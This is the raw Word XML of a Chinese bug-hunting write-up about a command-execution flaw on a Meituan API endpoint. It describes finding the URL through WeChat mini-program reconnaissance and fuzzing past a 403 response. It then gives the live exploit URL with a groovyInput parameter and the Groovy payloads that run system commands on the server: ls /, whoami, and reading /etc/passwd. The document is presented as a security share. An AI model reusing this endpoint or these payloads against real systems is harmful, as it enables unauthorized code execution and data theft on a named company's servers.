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美团api站点命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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0x01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本次简单的分享这个漏洞应为之前分享的SSRF盲攻击跟这个漏洞是一样的，都是利用一模一样的思路得到攻击，所以大家如果没看明白就去公众号“快识”看看那篇SSRF的挖掘文章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在一次业务信息收集时发现了改地址，我利用微信“小程序”小程序可以查看许多URL，这些URL都是没办法被正常的方式发现 ，所以挖洞的时候信息搜集想当重要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2365375" cy="4238625"/>
            <wp:effectExtent l="0" t="0" r="15875" b="9525"/>
            <wp:docPr id="5427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9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0x02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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正常来说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>api接口这种站点不是什么不常见的，应该属于主业务，就跟我之前分享的那个SSRF盲攻击一样，都是利用模糊测试得到的URL地址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扫描目录，得到了403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1816735"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1206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得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>403之后在对403下面隐藏的关键再来一次模糊测试，利用参数拼接在后进行FUZZ，得到了最新的完整地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://api.meituan.com/data/msm/ms?groovyInput=int+q%3D9" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>http://api.meituan.com/data/msm/ms?groovyInput=int+q%3D9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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这个地址是最后得出的命令执行接口，很多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>403，404这些下面都隐藏着许多的接口，所以不要放弃对403，404的测试，大的漏洞都是隐藏的很深</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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0x03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r>
        <w:t>链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://api.meituan.com/data/msm/ms?groovyInput=int+q%3D9" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>http://api.meituan.com/data/msm/ms?groovyInput=int+q%3D9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="28251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这是个执行groovy语言的交互端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>下面执行系统命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>执行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:  ls /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Groovy代码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Process p="ls /".text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="30308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执行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">whoami </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>代码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Process p="whoami".execute().text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="19227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3252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执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Process p="cat /etc/passwd".execute().text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="24682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4042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46"/>
    <w:rsid w:val="000943F5"/>
    <w:rsid w:val="001F3B5D"/>
    <w:rsid w:val="003004DF"/>
    <w:rsid w:val="003373DE"/>
    <w:rsid w:val="004720EA"/>
    <w:rsid w:val="004D3DEE"/>
    <w:rsid w:val="0052704A"/>
    <w:rsid w:val="005D0AF9"/>
    <w:rsid w:val="006000FC"/>
    <w:rsid w:val="006D395B"/>
    <w:rsid w:val="006F3E46"/>
    <w:rsid w:val="00785330"/>
    <w:rsid w:val="00887CF7"/>
    <w:rsid w:val="008E0942"/>
    <w:rsid w:val="00984CE9"/>
    <w:rsid w:val="009B2B6D"/>
    <w:rsid w:val="00B26855"/>
    <w:rsid w:val="00CA1142"/>
    <w:rsid w:val="00D91461"/>
    <w:rsid w:val="00E44011"/>
    <w:rsid w:val="5C7C176C"/>
    <w:rsid w:val="6F773067"/>
    <w:rsid w:val="70E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</Words>
  <Characters>298</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>349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2018-10-23T03:16:00Z</dcterms:created>
  <dc:creator>miduo</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-05T09:16:57Z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